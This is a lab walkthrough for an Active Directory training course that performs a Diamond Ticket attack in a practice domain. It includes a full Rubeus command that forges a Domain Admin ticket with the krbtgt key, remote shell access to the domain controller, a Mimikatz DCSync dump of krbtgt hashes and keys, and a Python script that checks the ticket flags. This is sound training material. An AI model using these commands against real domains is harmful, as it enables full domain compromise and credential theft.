Learning Objective 10
Tasks
1 – Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack
Flag 19 [dcorp-dc] – Name of the account whose secrets are used for the Diamond Ticket attack 🚩
Solutions
1 – Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack
Run a new shell as administrator and use the following Rubeus command to execute the Diamond Ticket attack. With /tgtdeleg, Rubeus obtains a genuine TGT for the current user from the DC, decrypts it with the krbtgt AES256 key supplied in /krbkey, rewrites the PAC (user administrator, RID 500, group RID 512 = Domain Admins), re-encrypts the ticket with the same key, and with /createnetonly and /ptt injects it into a freshly spawned cmd.exe:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

From the newly spawned cmd.exe (the process created by /createnetonly, which now holds the injected ticket), access the DC using winrs:
winrs -r:dcorp-dc cmd
set username

c:\Users\student98>klist
Current LogonId is 0:0x15d03183
Cached Tickets: (1)
#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 10/24/2025 4:38:27 (local)
End Time: 10/24/2025 14:36:05 (local)
Renew Time: 10/31/2025 4:36:05 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
c:\Users\student98>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator>set username
set username
USERNAME=administrator
C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
C:\Users\Administrator>
Flag 19 [dcorp-dc] – Name of the account whose secrets are used for the Diamond Ticket attack 🚩
The krbtgt account's secrets are used for the Diamond Ticket attack: its AES256 key (the /krbkey value in the Rubeus command above, which matches the aes256_hmac entry in the DCSync output below) is what decrypts the legitimately issued TGT, and what re-encrypts it after the PAC has been modified.
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
-snip-
29 40b43724fa76e22b0d610d656fb49ddd
mimikatz(commandline) # exit
Bye!
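The following Python script is an added example and is not part of the lab material or of Rubeus/Mimikatz. It performs the sanity checks a tester would do after the steps above: it parses the klist output shown earlier, decodes the Ticket Flags word (0x60a10000) into the names klist prints using the RFC 4120 TicketFlags bit layout, and confirms that the /krbkey passed to Rubeus is the krbtgt aes256_hmac key from the DCSync dump. The klist text and key values embedded below are copied from this write-up; the function names and the set of checks are this example's own.

```python
"""Sanity-check the Diamond Ticket run from this lab.

Added example; not part of the lab material, Rubeus or Mimikatz. KLIST_OUTPUT
and the key constants are copied from the output shown in the write-up. The
TicketFlags bit layout is RFC 4120 section 5.3 as printed by Windows klist
(flag 0 is the most significant bit of the 32-bit word).
"""
import re

# Inputs copied from the walkthrough output above.
KLIST_OUTPUT = """Current LogonId is 0:0x15d03183
Cached Tickets: (1)
#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 10/24/2025 4:38:27 (local)
End Time: 10/24/2025 14:36:05 (local)
Renew Time: 10/31/2025 4:36:05 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
"""
RUBEUS_KRBKEY = "154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848"
DCSYNC_AES256 = "154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848"

# RFC 4120 TicketFlags numbering; flag n has the value 1 << (31 - n).
TICKET_FLAGS = {
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may_postdate", 6: "postdated", 7: "invalid", 8: "renewable",
    9: "initial", 10: "pre_authent", 11: "hw_authent",
    12: "transited_policy_checked", 13: "ok_as_delegate",
    15: "name_canonicalize",
}


def decode_ticket_flags(value: int) -> list[str]:
    """Return the flag names set in a klist 'Ticket Flags' word, in klist order."""
    return [name for bit, name in sorted(TICKET_FLAGS.items())
            if value & (1 << (31 - bit))]


def parse_klist(text: str) -> list[dict]:
    """Split Windows klist output into one dict per cached ticket (#0>, #1> ...)."""
    tickets = []
    for chunk in re.split(r"^#\d+>\s*", text, flags=re.M)[1:]:
        fields = {}
        for line in chunk.strip().splitlines():
            m = re.match(r"Ticket Flags\s+0x([0-9a-fA-F]+)", line)
            if m:  # the only klist line without a 'key: value' colon
                fields["flags"] = decode_ticket_flags(int(m.group(1), 16))
                continue
            key, _, val = line.partition(":")
            fields[key.strip()] = val.strip()
        tickets.append(fields)
    return tickets


def check_diamond_ticket(ticket: dict, krbkey: str, dcsync_aes256: str,
                         user: str, realm: str) -> list[str]:
    """Return findings; an empty list means the run matches expectations."""
    findings = []
    if len(krbkey) != 64 or not re.fullmatch(r"[0-9a-fA-F]+", krbkey):
        findings.append("/krbkey is not a 32-byte hex AES-256 key")
    if krbkey.lower() != dcsync_aes256.lower():
        findings.append("/krbkey does not match the krbtgt aes256_hmac key from DCSync")
    if ticket.get("Client") != f"{user} @ {realm}":
        findings.append(f"client is {ticket.get('Client')!r}, not {user}")
    if not ticket.get("Server", "").startswith(f"krbtgt/{realm}"):
        findings.append("cached ticket is not a TGT for this realm")
    if "AES-256" not in ticket.get("KerbTicket Encryption Type", ""):
        findings.append("ticket is not AES-256 encrypted (check /enctype)")
    flags = set(ticket.get("flags", []))
    if "pre_authent" not in flags or "renewable" not in flags:
        findings.append("KDC-issued TGTs carry pre_authent and renewable")
    # A TGT obtained via /tgtdeleg is issued in a TGS exchange and forwarded,
    # so it carries forwarded/forwardable and lacks 'initial' (RFC 4120 5.3).
    if "forwarded" not in flags or "initial" in flags:
        findings.append("flags do not look like a /tgtdeleg-forwarded TGT")
    return findings


if __name__ == "__main__":
    tgt = parse_klist(KLIST_OUTPUT)[0]
    print(tgt["flags"])
    print(check_diamond_ticket(tgt, RUBEUS_KRBKEY, DCSYNC_AES256,
                               "administrator", "DOLLARCORP.MONEYCORP.LOCAL") or "OK")
```

The absence of the initial flag is the point worth noticing: a normal AS-REQ TGT on Windows shows 0x40e10000 (forwardable renewable initial pre_authent name_canonicalize), while the ticket above was obtained through the /tgtdeleg TGS exchange and forwarded, which is why it reads forwarded without initial. Feeding the aes128_hmac value from the dump as the key makes the check fail on both the length and the mismatch, which is the mistake the script is there to catch.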